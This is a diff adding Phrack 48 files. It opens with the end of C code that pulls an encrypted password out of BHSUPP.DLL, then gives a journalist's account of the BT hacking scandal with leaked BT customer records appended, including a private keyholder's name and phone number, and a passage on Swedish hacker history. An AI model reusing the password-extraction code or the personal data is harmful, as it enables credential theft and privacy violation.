+	WriteFile(g_hStdOut, lpszPrompt, sizeof(lpszPrompt), &nCount, NULL);
+
+	ReadFile(g_hStdIn, lpszTargetFile, MAX_PATH, &nCount, NULL);
+
+	//I had to account for the CR + LF that ReadFile counts in the nCount return value,
+	//so I can zero terminate this string.
+	lpszTargetFile[nCount - 2] = 0L;
+	
+	*phTargetFile = CreateFile(lpszTargetFile, GENERIC_READ, FILE_SHARE_READ | 
+							 FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 
+							 FILE_FLAG_SEQUENTIAL_SCAN, NULL);
+
+	//too lazy to make the error message report the actual path and file name tried 
+	if(*phTargetFile == INVALID_HANDLE_VALUE)
+	{
+		WriteFile(g_hStdOut, "Unable to open BHSUPP.DLL\n",
+				  26, &nCount, NULL);
+
+		ExitProcess(1L);
+	}
+}
+
+
+//	This function allocs one big buffer and reads the whole damn DLL into it.
+//	There is a flag string that marks the start of the section that contains the 
+//	encrypted passwords (in the case that there is a display password too), so
+//	we search for the first and last characters in the string.  If we hit on a match
+//	we check about 50% of the chars in the string for a match.  This is a good
+//	enough check based looking at the data.  I guess I could optimize memory usage 
+//  here too, but 24K is not very much these days, so fuck it.
+BOOL GetEncryptedPassword(HANDLE hTargetFile, LPBYTE lpEncryptedPassword)				   
+{
+	LPBYTE lpSearchBuffer;
+	UINT nCount, i;
+
+	//do the big buffer alloc
+	lpSearchBuffer = malloc(MAX_FILE_SIZE);
+
+	if(lpSearchBuffer == NULL)
+	{
+		WriteFile(g_hStdOut, "Memory Allocation Failure - Terminating\n", 
+				  41, &nCount, NULL);
+
+		ExitProcess(1L);
+	}
+
+	//read in the entire file.  It is small enough that this takes trivial time to complete.
+	ReadFile(hTargetFile, lpSearchBuffer, MAX_FILE_SIZE, &nCount, NULL);
+ 
+	//do search for RTSS&G--BEGIN--  When it is found move 48 bytes past the R and copy
+	//the encrypted password into the workspace
+	for(i=0; i<nCount; i++)
+	{
+		if(lpSearchBuffer[i] == 'R' && lpSearchBuffer[i+14] == '-')
+		{
+			if(lpSearchBuffer[i+1] == 'T' && lpSearchBuffer[i+2] == 'S' &&
+			   lpSearchBuffer[i+3] == 'S' && lpSearchBuffer[i+4] == '&' &&
+			   lpSearchBuffer[i+8] == 'B')
+			{
+				//found password and coping it into the workspace
+				memcpy(lpEncryptedPassword, &lpSearchBuffer[i+48], 32);
+				
+				//cleanup the mem alloc
+				free(lpSearchBuffer);
+
+				//return with success
+				return TRUE;
+			}
+		}
+	}
+
+	//cleanup
+	free(lpSearchBuffer);
+	
+	//it failed to find the marker string
+	return FALSE;
+}
+
diff --git a/phrack48/16.txt b/phrack48/16.txt
new file mode 100644
index 0000000..94d3874
--- /dev/null
+++ b/phrack48/16.txt
@@ -0,0 +1,341 @@
+                              ==Phrack Magazine==
+
+                 Volume Seven, Issue Forty-Eight, File 16 of 18
+
+
+             THE TRUTH, THE WHOLE TRUTH AND NOTHING BUT THE TRUTH-
+                   -a story of the 'BT-Hacker' scandal.
+
+                               By Steve Fleming
+
+
+Sitting in a chilly university computer department in northern England
+was in itself exhilarating.  The mid-February climate made it cold; my
+head was buzzing with voices chatting freely about gaining access to
+secret computers, acquiring free telephone calls and how to fashion
+'bombs' to maim or kill lecturers and 'Senior Vice Principles'.  There
+was nobody else in the room, all the company was just under a meter from
+me in CyberSpace, that alternative universe where anything is possible
+and everyone is somebody they want to be.  The stories were
+extraordinary - in fact they were incredible, an eclectic mix of fact
+and fantasy bound together by expert social engineering.
+
+These CyberSpace 'cafes' are the BBS' - Bulletin Board Services - and
+are the stock-in-trade of the electronic community.  The Internet is
+connected to some of them, but the best ones, the ones with the best
+chat and the most exciting files are not - you get the dial-in number
+from another user, and have to then beg to use the service.  It is
+interesting to note that the Internet has now become a generic term for
+on-line communication and suffers as a result of its inappropriate use.
+Blaming the Internet for anything is like apportioning culpability to
+'society' - fine for academics but otherwise a shallow construct.
+
+I have known some computer experts in my time, and still some 'reformed
+hackers' count as my best friends - I really wanted to find out if a
+major British computer could be hacked or if it had been done.  The UK
+has some of the most draconian secrecy laws anywhere on the planet, so
+if secrets are found, they tend to be kept secret.  When people start
+talking in CyberSpace, they really talk and talk and talk.  Their voice
+has no tone or volume, no emotion or mood - it can be like talking with
+a form of electronic psychopath sometimes.  But there are inventive
+ideas 'on-line', and sometimes you can SHOUT, but this is quite rude,
+mostly pictorial punctuation (the smiley) is the key.  You can indicate
+a smile :-)  or a frown {:-(  and you can even indicate sarcasm ;-) with
+a sly wink.  It's interesting to note that irony is not really a north
+American thing at all;  sarcasm is a CyberSpace thing. I wouldn't say
+that I am an expert, I wouldn't even say that I was very good with
+computers, I'm always learning.  My qualifications are in science;
+Biology and Psychology, not computing.  What this gives me is an urge to
+investigate assuming a null hypothesis - I disprove things in short.
+It's funny to think that most of the press followed a placed PR line
+that I must be a '... twisted computer boffin who had broken into an
+'...entirely robust...' computer system'.  And my, did that title stick
+- friends from Hong Kong to Turkey called to say I was a computer expert
+all over the world!  This was very effective and obviously placed by
+someone with powerful influence, perhaps advertising influence?  It
+doesn't really matter, bad journalism is all over and we all have a
+living to earn - I however, would never do it at the expense of a
+colleague.
+
+There was the vision of news editors screaming, "... get me some
+secrets!" - they simply couldn't believe that a freelance with only a
+few published pieces could have brought in such an impressive story with
+a scandal at every level - so they capitulated with the 'boffin' lie and
+went back to boring, standard, sloppy 'background' on this 'hacker'.  It
+was actually a bit of a personal tragedy, my on-line persona was
+cracked, there wasn't very much in my life at all, quite a boring person
+really; like most journalists who spend a lot of time observing rather
+than doing.  The Today newspaper had some hot tip-off's from people I'd
+interviewed in the past, one man in particular who had lied in a silky
+and attractive way for two and a half hours had been doing the same to
+them.  The fact that I wrote for a 'gay magazine'.  Shock horror, a
+definite Philby, Burgess & McLean story breaking.  What a bit of
+investigate journalism that wasn't, I wrote under my own name!  Was he a
+spy, was he working for Libya, Israel, MI-6, MI-5, the Labour Party,
+Duncan Campbell, Richard Gott... and then there was the 'shit-bagging'.
+This happens when tardy investigators are ignorant of the facts,
+automatically they assume it should be them who had the story, if only
+they'd had the time.  But this is all history now, and I forgive them
+all... but I never forget.
+
+How could a temporary member of staff see all this secret information?
+The list forming in the mind of the press (and I do think in situations
+like these one surprisingly tiny mind) went something like this:
+
+1.	They aren't secrets at all.
+
+2.      BT would know if anyone had looked at the secret stuff, so
+        they'll catch the whistle-blower; probably working for computer
+        security within BT.
+
+3.      Fleming is a computer expert, he's hacked the system and is
+        spinning a story to prevent him being found out - and he's not a
+        'real' journalist and we are.
+
+Well, there was clear evidence that the stuff was very sensitive, so
+strike number 1 from the list.  How could they wait for stage two, if it
+is the case it may take days or weeks, so they couldn't have that -
+anyway the Independent had shown it could be done away in time or place
+of Fleming.  The only option was;  who's there, who'll talk, and how can
+we retain credibility as journalists - repudiate the freelance!
+
+There was no shortage of shit-bag material; 'various anonymous
+sources... unconfirmed reports... it seems likely etc.'  Some even
+fancied the idea that the details were shocking, but lets just do it all
+ourselves and dump on Fleming from a great height?  It really was like
+being on a maggot farm, wading through pen after pen of repulsive,
+brainless, panicked... maggots.
+
+The truth is that there was no great skill involved in cracking BT's
+computer, it was so easy my pet parrot could have done it with only one
+claw.  Many companies are confused about computer security and what it
+means.  The sharp young suits talk about 'magneto-optical storage
+facilities' and 'EPROM or WORM access'.  The captains of industry nod
+sagely, they run the ship and leave the deck scrubbing to junior
+officers.  These proud, self important and generally thick as two short
+planks when it comes to computers men, authorise huge budgets for the
+whiz-kids who play with the money, buy new things, install new software,
+'patch' the operating system, attach ISDN cards, issue user ID's after
+extensive family checks.  You name it, and these guys do it, and they
+love it.  They install password checkers that look for hackers (or
+errors) and disconnect users for 15 minutes if they get their passwords
+wrong three times.  The captains of industry still discuss 'wireless'
+and 'word processors'.  The bright young men should be allowed to deal
+with all the computer stuff, it's not that the captains can't understand
+it or anything like that, they just don't have the time.
+
+Staff who have to work the systems couldn't care less about the
+'advanced software engineering' that went into the system.  There is as
+much 'social engineering' as any other sort when it comes to computers
+for industry.  So they have to remember passwords that change regularly
+and they have to remember to get that report done, and see the boss and
+train the new staff and type that letter and claim those expenses and
+design that form and... it's a lot to remember.  When folk have a lot to
+remember they make lists, and those lists include passwords - sounds
+like an opportunuty for 'trashing'.  They simply look through the
+rubbish and see what they can see.  Sometimes someone writes down a
+password on a post-it note to let someone into their computer for some
+reason, that person enters the password and makes a note in their diary
+of it and pops  the sticky in the bin.  Then, in these busy offices,
+staffing levels are being cut.  The  managers need a dozen staff, and
+have four.  They are allowed to contract from a temp agency and top up
+the office. These people are often unemployed graduates.  Clever, but
+very, very bored.  They don't get paid much, 4.00 an hour.  That's what
+I was paid to write a nationwide database suite for BT but there I have
+to stop, the gag is cutting into me.  They just want a decent job, and
+try to impress in case they get offered one, and the companies play on
+this and exploit without mercy.  4.00 an hour and they want unbridled
+enthusiasm, ideas, loyalty, commitment - who are they trying to kid!
+
+The computer administrators say they can't give temporary access to the
+system, '... it can't be done.'  Well what do you suggest?  'You'll just
+have to make do, it's the system, can't help, sorry.'  You need a dozen
+workers, perhaps 6 need to be on the system, you have 5 passwords plus
+another of the departmental manager making six.  Why not let the temps
+use these passwords and you can get on with the more important stuff,
+can't be any harm in that?  It's not as if we're using them?  However,
+temps are just that, temporary - they move on.  Consequently with all
+the changes you make up a folder with all the passwords and then they
+can just flick through that to find a password, it doesn't seem all that
+insecure does it?
+
+And there we have it, passwords being shared, passed, written down,
+typed in and shouted across the office.  You can forget about any notion
+of security, the moment you take that step the whole system is
+pointless, you may as well print out all the secret information and sell
+it in Dillons - it would certainly make the phone book a best seller!
+Better still if the marketer's got what they wanted, put it on CD-ROM
+and charge a fortune for it at christmas;
+
+The Multimedia Secrets Collection, 199.95!  
+
+The ideal christmas gift for the spy in your life.  Includes music from
+around the world.  BT, it's good to talk!  NB it may be an offence to
+talk to anybody about this.
+
+Now you see why BT are keen to quell this espial, they know the
+situation, but don't want it publicised, it's very embarrassing for
+goodness sake - they have a contract to advise the government on
+computer security!  Frankly, I couldn't care less if some BT mandarin
+gets a red face, it is no concern of mine.  What is, is the fact that
+these secrets are not encrypted and are broadcast around the country on
+computers and are available to just about anyone who cares to look at
+it.  The only warning displayed was 'Unauthorised access is an offence
+under the Computer Misuse Act (1990)' - but this access isn't
+unauthorised, is it?  This notion of 'confidential' is a joke.  BT's
+computers happily broadcast your ex-directory telephone number (and soon
+your name) down the line unless you make the choice to prevent it.  What
+is confidential about that?  The public interest is of prime importance
+here.  The scandalous intimition in my legal gag is that I am risking
+national security?  Me!  Well I have a lot to say about that, it's not
+me that allows any old temp to see secrets, and I have never printed a
+single telephone number or details of any equipment, unlike some
+respected others.  I brought the fact this could be done to light in a
+responsible journalistic manner.
+
+If I was such an expert, the intelligence service would have snapped me
+up immediately, BT would have paid me off and the government could have
+avoided embarrassment.  But I'm not, I'm a journalist.  The Independent
+published this story and I have respect for them, they took a risk and
+then wanted to distance themselves from me, which I understand.  It was
+however a lonely, cold and frightening experience which is not yet over.
+
+The governments of these lands talk big about how the information
+superhighway will change all our lives, and how committed they are to
+servicing this new form of infrastructure leading to a new, fresh and
+exciting dimension - but they also punish, abuse, prosecute, imprison
+and destroy the lives of the people who may be far better able to
+exploit their ignorance and expose the sensitive underbelly of their
+power - their information.  If you ask me, the old guys will make
+CyberSpace just as ugly and corrupt as the society they have already
+spawned, nurtured and set on a path of destruction out here.  I for one
+don't want or need their advice, support or money - let them lay in the
+bed they have made, I'll stay in CyberSpace.
+
+------------------------------------------------------------------------------
+
+                     - Related Info Appended by the Editor -
+
+
+                           DCS    DISPLAY CUSTOMER SUMMARY       ??/??/?? 11:41
+
+Name   : THE CHIEF CONSTABLE                 Telephone No : 031-315 2007   NQR
+                                             Account No   : 8077 0366
+Address: LOTHIAN & BORDERS POLICE            Customer Type: BUSINESS VOLUME
+         POLICE HEADQUARTERS                 Installations:  1
+         5 FETTES AVE
+         EDINBURGH                           LINE DETAILS
+         EH4  1RB                            Installed    : 26/08/88
+                                             Line Status  : B/W
+                                             Curr State   :
+                                             Inst Class'n : BUS SINGLE EXCL
+                    ORDER                    Exchange Type: TXDX03
+RECEPTION MARKER    Recent Order : YES
+                    Contr Signed :           BILLING
+REPAIR              CONSENT                  Method of Pay: ORDINARY ACCOUNT
+             : NO   Systems Bus  : C         A/C U/Enquiry: NO
+Servicecare  : NO   Sup Serv Bus : D         D/M Case     : NO
+O/S fault    : NO                            Cust Options : STANDARD VRUF
+Hist fault   : NO                            OSC Ind      : NO
+Hazard       :                               CUSTOMER CONTACTS
+Warning      :                               Issue        : NO     Notes : YES
+
+ BRDCST MANAGERS USING NJR-PLEASE DNB"NJRNEWS" FOR UPDATE ON CALLOUT PROBLEM ES
+4A_                                                       O-O
+                           DCRD   PRODUCT TARIFF DETAILS         ??/??/?? 11:41
+
+ Exchange Name : DEAN                              Tel No : 031-315 2007  NQR
+ Installed     : 26/08/88                          a/c No : 8077 0366
+ Inst Class'n  : BUS SINGLE EXCL     Notes : YES   S/S No :
+
+ QTY   PROD ID    SHORT DESC or MSC / CP NOTE       TARIFF:RATE         TOTAL
+
+    1  A14499  C  EXCH LINE + LINEBOX                       32.66         32.66
+       *
+    1  A10117  C  BASIC DIAL PHONE                           4.70          4.70
+       *
+    1  A12481  C  PRIVACY SET NO 8                          51.75         51.75
+       *
+
+
+                                             TARIFF GRAND TOTAL :         89.11
+                                                                             ES
+4A_                                                       O-O
+                           DIN    DISPLAY NOTE DETAILS           ??/??/?? 11:41
+
+ Installation : THE CHIEF CONSTABLE            Tel no :  031-315 2007     NQR
+ Name
+
+             WRITTEN    <         AUTHOR           >    EXPIRES
+
+              8/ 2/94   JOSEPHINE/8813                  8/ 2/95
+
+             A/.D LTR SENT FOR 0506843235,0313322106
+             0506881101 AND 0313152007
+                           
+                           
+                           
+                           
+                           DCS    DISPLAY CUSTOMER SUMMARY       ??/??/?? 11:43
+
+Name   : LOTHIAN & BORDERS POLICE            Telephone No : 031-332 2106   NQR
+                                             Account No   : 8076 9640
+Address: POLICE HEADQUARTERS                 Customer Type: PAYPHONE BUS
+         5 FETTES AVE                        Installations:  1
+         EDINBURGH
+         EH4  1RB                            LINE DETAILS
+                                             Installed    : 04/10/83
+                                             Line Status  : B/W
+                                             Curr State   :
+                                             Inst Class'n : BUS PAYPHONE
+                    ORDER                    Exchange Type: TXDX03
+RECEPTION MARKER    Recent Order : NO
+ BMC/C/N/ / /       Contr Signed : YES       BILLING
+REPAIR              CONSENT                  Method of Pay: ORDINARY ACCOUNT
+             : **   Systems Bus  : D         A/C U/Enquiry: NO
+Servicecare  : S    Sup Serv Bus : C         D/M Case     : NO
+O/S fault    : NO                            Cust Options : SINGLE LINE OPTION
+Hist fault   : NO                            OSC Ind      : NO
+Hazard       :                               CUSTOMER CONTACTS
+Warning      :                               Issue        : COM    Notes : YES
+
+                                                                             ES
+4A_                                                       O-O
+                           DCRD   PRODUCT TARIFF DETAILS         ??/??/?? 11:43
+
+ Exchange Name : DEAN                              Tel No : 031-332 2106  NQR
+ Installed     : 04/10/83                          a/c No : 8076 9640
+ Inst Class'n  : BUS PAYPHONE        Notes : YES   S/S No :
+
+ QTY   PROD ID    SHORT DESC or MSC / CP NOTE       TARIFF:RATE         TOTAL
+
+    1  A17867  C  PAYP LINE SKTD SGL LINE TG10              32.66         32.66
+       *
+    1  A19493  C  OPTION 50 NON-ISDN SITE LINE               0.00          0.00
+       *
+    1  A11790  C  INTERNAL EXTN OFF MASTER SCKT              0.00          0.00
+       *
+    1  A17817  O  MINSTREL PLUS PHONE                    Outright    sale
+       FREE GIFT - NO GUARANTEE
+    1  A11810  C  METER PULSE FACILITY                       6.70          6.70
+       *
+    1  A19398  C  PAYPHONE 190MP TABLE-TOP MODEL         Outright    sale
+       KEYHOLDER BETTY MITCHELL ON 031.311.3338
+    1             Standard Care charge on A19398            12.00         12.00
+       *
+                                             TARIFF GRAND TOTAL :         51.36
+                                                                             ES
+4A_                                                       O-O
+                           DIN    DISPLAY NOTE DETAILS           ??/??/?? 11:43
+
+ Installation : LOTHIAN & BORDERS POLICE       Tel no :  031-332 2106     NQR
+ Name
+
+             WRITTEN    <         AUTHOR           >    EXPIRES
+
+              8/ 2/94   JOSEPHINE/8813                  8/ 2/95
+
+             A/.D LTR SENT FOR 0506843235,0313322106
+             0506881101 AND 0313152007
+
+
diff --git a/phrack48/17.txt b/phrack48/17.txt
new file mode 100644
index 0000000..9b72a66
--- /dev/null
+++ b/phrack48/17.txt
@@ -0,0 +1,544 @@
+                              ==Phrack Magazine==
+
+                 Volume Seven, Issue Forty-Eight, File 17 of 18
+
+****************************************************************************
+
+                             International Scenes
+
+There was once a time when hackers were basically isolated.  It was
+almost unheard of to run into hackers from countries other than the
+United States.  Then in the mid 1980's thanks largely to the existence
+of chat systems accessible through X.25 networks like Altger, tchh and
+QSD, hackers world-wide began to run into each other. They began to
+talk, trade information, and learn from each other. Separate and diverse
+subcultures began to merge into one collective scene and has brought us
+the hacking subculture we know today.  A subculture that knows no
+borders, one whose denizens share the common goal of liberating
+information from its corporate shackles.
+
+With the incredible proliferation of the Internet around the globe, this
+group is growing by leaps and bounds.  With this in mind, we want to
+help further unite the communities in various countries by shedding
+light onto the hacking scenes that exist there.  If you want to
+contribute a file about the hacking scene in your country, please send
+it to us at phrack@well.com.
+
+This issue we have files about the scenes in Sweden and Brazil.
+
+------------------------------------------------------------------------------
+
+The Swedish Hacker Scene
+
+It's about time to fill up this hole in the worldwide history of hackers
+published in the Phrack series of articles on national scenes. Since no
+one else seems to be getting around to do it I'd better do it myself.
+
+Sweden was in fact one of the countries in the front line during the
+birth of computers in the 1940's and 50's. By 1953 KTH university in
+Stockholm built BESK, at the time being the fastest and most advanced
+computer in the world. During the late 1960's Linkoping university
+specialized in computer science and in 1973 the computer society Lysator
+started out as an offshoot of american hacker culture of the kind you
+could find at MIT during the 60's and 70's. They are still active and
+often referred to as the first Swedish hacker society ever, which is
+indeed true. Now days they still adhere to the international hacker
+ethic of university societies and among their lines are as well idiots
+as real bright guys (as is the case of most such societies) and their
+contributions to the world of e-culture include Project Runeberg; a text
+archive of Scandinavian literature, and a voluminous FTP archive.
+There's actually a lot of ASCII work being done at Lysator, including
+converting Phrack back issues to HTML format.
+
+Despite the early interest in computers in Sweden there was no
+equivalent to the American phreakers of the 1970's. This was not caused
+by lack of knowledge but rather by dullness. Sweden was during the 70's
+and early 80's in a period of both economic wealth and social mentality
+commonly known as "The Welfare State". Everybody was facing the same
+high economic standards, nobody was really displeased with Swedish
+society, and the government granted lots of spare-time activities for
+youths. Thus the growing ground for any outlaw societies was withdrawn.
+(Eg Hells Angels didn't start out in Sweden until the 80's.) Swedes were
+in fact too pleased, too wealthy and too filled up with their vision of
+an almost utopian society to even get the faintest glimpse of an idea to
+form any underground movements. Even political groupings like
+Anarchists, Hippies (in Europe referred to as "Provos") or Fascists were
+almost WIPED OUT by the extreme political climate and wealth of the
+70's.
+
+Thus, phreaker culture couldn't possibly start out in Sweden at this
+time, though some freaked out engineers and radio-amateurs might have
+built blue boxes and similar equipment for their household needs. This
+state of society caused Sweden to lag behind other European and
+Scandinavian countries in the field of outlaw hacking.
+
+The first hacker activity in Sweden was reported by the authorities in
+1980. The hacker in question was a student at Chalmers university in
+Gothenburg and was sued for manipulating the account system into
+granting him free access to the mainframe, for which was sentenced to a
+relatively light fine. Apart from some similar incidents carried out by
+bright individuals there was no real H/P scene until 1984. Also in 1980
+BBS activity started out in Sweden. Most enthusiasts were using a
+Swedish micro built by Luxor and DIAB in 1978 called ABC-80 (Obviously
+inspired by the American TRS-80). These enthusiast, however, were well
+organized engineers running a straight user-group, no anarchists or
+radicals of any kind were ever involved.
+
+In 1984 a magazine called "Rolig Teknik" started out as an offshoot of
+YIPL/TAP featuring the same kind of material, and by 1987 some
+journalist "discovered" this magazine, causing a lot of noise throughout
+The Welfare State and bringing people out in a public debate of how to
+defeat this magazine. (Though it actually didn't feature any illegal
+material; even Sweden has the freedom of speech and press written
+explicit in its constitution, as in the American First Amendment.)
+"Rolig Teknik" rapidly became a cult media for underground electronic
+freaks, outlaw radio amateurs, and other antisocial movements. But let's
+not get ahead of events.
+
+By early 1984 two youths aged 17 and 19, clearly inspired by the movie
+"War Games", hacked their way into several Swedish computer systems
+using a simple Apple II and a 300 baud modem, notably DAFA-Spar - a
+register containing public information on every Swedish citizen. Though
+there were no secret data in this computer, and though these hackers
+never succeed in gaining root access, the incident was annoying to the
+authorities. Also this year, some wealthy upper-middle class youths
+started using the was-to-become major European home computer: the
+Commodore 64. What the Apple II was for America, the C-64 was for
+Europe. Enter the software crackers.
+
+C-64 was THE symbol of hackerdom to Swedish youths in the 1980's. As
+software cracker Mr.Z pioneered the hacker scene in 1983 with hundreds
+and hundreds of cracked games, Swedish hackers somehow got to believe
+that cracking games was the Big Thing for any hacker. Besides, not many
+of these guys had modems. By 1987 American game producers were alarmed
+by the Niagara of cracked C-64 software being downloaded from Europe,
+causing them to start copy-protecting games that were to be exported to
+Europe. A closer examination showed that a lot of these cracks were made
+by Swedish groups, notably Triad and Fairlight. Thus, most Americans to
+get in touch with the Swedish hacker scene were what you would refer to
+as the "Warez D00ds" or "Pirates" of the time. Since the Swedes were
+unable to phreak due to lack of knowledge in the telecom field, American
+warez d00ds constantly called up Swedish crackers to obtain the latest
+software.
+
+There seems to be some kind of misconception in the American view of the
+hacker culture of Europe: Not very many hackers in Sweden and the rest
+of Europe got into phreaking nor net hacking in these early years,
+perhaps with the exception of the movement in Germany caused by Chaos
+Computer Club. By tradition most European hackers in general, and
+Swedish hackers in particular, turned to software cracking and demo
+programming. (The Demo as an art form was invented in Europe during
+1984-86.) None of these activities were actually illegal at the time
+being, though indeed underground. This might have helped to create the
+general American view of European hackers as "Idiotic Immature Warez
+D00ds". In fact, most European hackers look upon software cracking and
+demo programming with pride, though spreading (warez trading) wasn't
+considered a real hacker activity, and pirating for economic gain was
+looked upon with disgust and utter contempt. Software spreading in all
+forms was finally outlawed in Sweden January 1st 1993.
+
+1986: Enter the Netrunners.
+By the year 1986 the legendary BBS "Tungelstamonitorn" under the
+supervision of Jinge Flucht began distributing H/P and Anarchy files.
+Jinge himself, being a social inspector and thereby fully aware of the
+state of society, was upset with The Welfare State and thought the
+Swedes had gone law-abiding in an absurd and unhealthy manner. In his
+view people seemed to accept laws without ever questioning them, thereby
+making Sweden into a conformistic utopian hell. Later Jinge joined the
+Fidonet where he got known for running the most explicit and intense
+debates in Swedish BBS-culture ever.
+
+Probably the H/P files stored at Jinges BBS were the spark that lit the
+Swedish net hacking scene. Swedish hackers had SEEN "War Games", HEARD
+about the CCC in Germany, and now they finally got their hands on
+documents that explained the techniques. In 1987 excerpts from Steven
+Levy's "Hackers" and Bill Leebs "Out of the Inner Circle" were reprinted
+in the Swedish computer- magazine "Datormagazin" by editor Christer
+Rindeblad, creating a common group-awareness among Swedish hackers.
+("Out of the Inner Circle" had actually been translated to Swedish
+already 1985, but was obviously read mostly by security experts and War
+Games-obsessed wannabe's.) 1987 also saw the birth of the first
+all-Swedish hacker group ever to make themselves a name outside
+Scandinavia. This was of course SHA - Swedish Hackers Association.
+
+SHA wanted to be a hacker group of international standards and
+qualities. They collected the best people, storing up a knowledge basis
+for future use. In the years 1989-92 SHA was at its height, successfully
+trashing computer companies and computer scrap dumps and gaining access
+to hundreds of computers. Inspired by the German hackers Pengo and
+Hagbard in Leitstelle 511 they started having regular meetings on
+fridays at their own booked table in a restaurant in Stockholm. Their
+perhaps biggest achievement ever was made in 1991 when they wrote a
+scanner to exploit the Unix NIS-bug, running it on 30 processes
+simultaneously, and ending up with some 150.000 passwords whereof 600
+gained root access. Though some would say SHA were a bit too fond of the
+media image of hackers and sometimes had a weakness for hacker cliches,
+no one can really deny their achievements.
+
+Swedish hackers also got a lot attention for their carding activities in
+1989. Both Sneaker of SHA and Erik XIV of Agile wrote modulo
+10-calculators to produce endless series of valid Visa-numbers. Erik XIV
+was even on national television, demonstrating the weaknesses of the
+credit card system. Cynically they were both busted.
+
+At Christmas 1990 the Swedish X.25 network Datapak and Decnet were both
+attacked by a group of UK hackers called 8LGM (8 Little Green Men or
+8-Legged Groove Machine - I don't know which one is a media nick). Using
+a war dialer they scanned about 22.000 entries and successfully accessed
+380 of these. This is perhaps the most well-known of all hacks in
+Sweden, causing a lot of media noise. (The exact figures are a product
+of the Swedish telephone system AXE that I will write more about in a
+moment.) As reported in Phrack #43 they were busted and convicted under
+the new British anti-hacker law.
+
+Later Swedish achievements include the phonecard emulator, constructed
+by Atari ST enthusiast Marvin in 1992, after hearing the Swedish phone
+company Telia boast of these prepaid phonecards superior security.
+Though these silicon-based chip phonecards (256 bytes serial EPROMs)
+couldn't actually be recharged or easily tampered with, he realized
+there was no problem in emulating the chip with a Motorola 68c705
+one-chip computer. Some fake phonecards were manufactured and sold for
+almost nothing among his very best friends more on a "See, it can be
+done"-basis than with any intention to defraud Telia or earn heaps of
+money. Somehow the blueprints for the emulator found its way into the
+Internet.
+
+Swedish hackers in general have a very strong tradition of forming
+groups, due to their roots in programming activities rather than
+phreaking. Group awareness and culture is very widespread and accepted
+within the boundaries of the whole Swedish computer underground. Thus,
+LOYALTY is very strong among Swedish hackers. Most hackers who get
+busted by authorities or blackmailed by companies would rather DIE than
+telling the name of even a single 10-year old warez d00d.
+
+While we're at it - hacker busts, and phreaker busts in particular, are
+carried out in quite a disturbing manner in Sweden. To explain this I
+must first explain a bit about the Swedish telephone system.
+
+Almost all Swedish networks use a system similar to 4ESS, constructed in
+cooperation by the State Telecom "Televerket" and Swedish
+telecommunications equipment producers Ericsson Telecom. This system is
+called AXE, which is an abbreviation for Automatic Cross-Connection
+Equipment. AXE is used in some 100 countries all over the world and
+probably one of the most beautiful exchange systems ever developed. AXE
+is designed for national, metropolitan and rural networks, and the same
+system nucleus is used in all the different systems. It can control both
+digital and analog equipment, though it's made with the aim on
+transforming all Swedish networks from analog to digital connections. It
+also comes with a fully featured bureaucratic organization for
+maintenance, administration and economics in general. AXE has the
+capability of building virtual groups in switching-stations, thus
+putting your PBX into the telco soup as well, making you believe you
+have the control over it though it's actually located elsewhere.
+
+In short, this is an centralized, monolithic system of the horribly
+efficient type that telcos love. It tells any amateur to keep their
+hands off and do something else. Of course it's a system that hackers
+and phreakers hate, since it's limited to authorities. The filthy crowd
+do not know what is going on inside these exchanges, and the telcos like
+to keep it that way.
+
+AXE also works with stored program control that resides inside the
+system core of every switching station. Of course this is all software,
+and of course State Telecom, upon building AXE, couldn't hold back their
+Big Brother tendencies.
+
+The result is that every call made from anywhere to anywhere, is logged
+in a central computer. Now that's something! Not only did this equipment
+wipe out every possibility to box within Sweden, but it also removed all
+kind of phone privacy. In fact not only calls are logged, but ALL
+activity performed at your terminal. If you lift the handset, press a
+digit and hang up, time, date and the digit you pressed is registered.
+All this data is stored on magnetic tapes for 6 months.
+
+Now, luckily Sweden has a strong Computer Privacy Act. You just aren't
+allowed to set up and use such facilities as you please, not even if you
+are the State Telecom. There is even a specific authority,
+"Datainspektionen" (The Computer Inspection Department) with the only
+purpose of looking after and preserve citizen privacy by protecting
+individuals from corporate and governmental interests. As a result State
+Telecom "Televerket" (which later changed name to "Telia" as they were
+transformed from an authority into a private corporation as of July 1st
+1993) were not allowed to give out any of the information gathered in
+these registers to anyone else than either the calling or the receiving
+party. Not even the police could have this information in case they
+weren't suspecting a indictable crime resulting in at least 2 years of
+prison, such as drug trading or terrorism, and you don't get that kind
+of penalty for phreaking alone - at least not in Sweden.
+
+But Telia could evade these restrictions. In order to successfully
+phreak using PIN-codes, you have to call an operator using a Swedish
+version of the 800-number: a 020-number. Telia could then claim the call
+was made to the owner of that number: AT&T, MCI & Sprint mostly. (There
+are of course Calling Cards in Sweden as well: "Telia Access" - neither
+used nor abused by anybody.) As well as these companies have their own
+intelligence agencies, so have Telia. Once eg AT&T had someone traced
+for phreaking, Telia could easily produce a complete list of calls made
+to AT&T operators from a certain number. Telia themselves would even use
+information they weren't allowed to: they would pull out a list of ALL
+outgoing calls from the phreaker in question including calls to MCI,
+girlfriends, mom, dad, grandma... all logged calls.
+
+Telia would then call this poor phreaker to their local Swedish office,
+sticking the endless list under his/her nose, commanding: "TALK, or we
+will turn you in to the authorities", carefully not to mention that all
+information on the printout would be absolutely useless in court. The
+only conclusive evidence would in fact be those calls traced back all
+the way from America or wherever the phreaker called; in that way
+rigorously documented. Naturally, the common phreaker had no legal
+experience and wouldn't know about this. Instead he would talk, giving
+out detailed information on his/her techniques worthy of a full-time
+high-educated security consultant. After this session the phreaker was
+given a bill of the calls that could indeed be proven in court. If
+he/she didn't pay it - Telia (or any other operator) would end up
+turning him/her to the authorities anyway. So much for cooperation.
+Telia themselves would, if they felt it was necessary, go even further
+than the overseas operators, systematically exposing every weakness in
+the phreakers personal life, using the information in the computer log
+for psychological terror.
+
+This pattern of treatment of Swedish phreakers seems to be very much the
+same among all telecom providers in Sweden. Lately Telia, under command
+of security officer Pege Gustavsson made some noteworthy mistakes
+though: in their efforts to convict as many phreakers as possible, they
+called up companies receiving calls from "suspicious" individuals,
+warning them about this or that person calling them over and over again.
+This could only mean Telia was also systematically monitoring some
+Swedish hackers and had formed some security group to carry out this
+probation. Normally this should have been kept quiet, as Telia are
+absolutely not allowed to form their own abuse police forces, but at
+some instance they happened to call up a security company using
+phreakers as informants. Of course this security company didn't like the
+idea of having "their" phreakers traced around, and the matter was
+brought to public attention. Many independent sources agreed that Telia
+had violated the Swedish Computer Act, and hopefully this brought an end
+to this wild tracing. You shouldn't be too sure though, since Telia
+themselves never confessed of doing anything illegal.
+
+As you might have understood the Computer Act is quite an important
+factor in all legal discussions concerning Swedish hacking. This Act
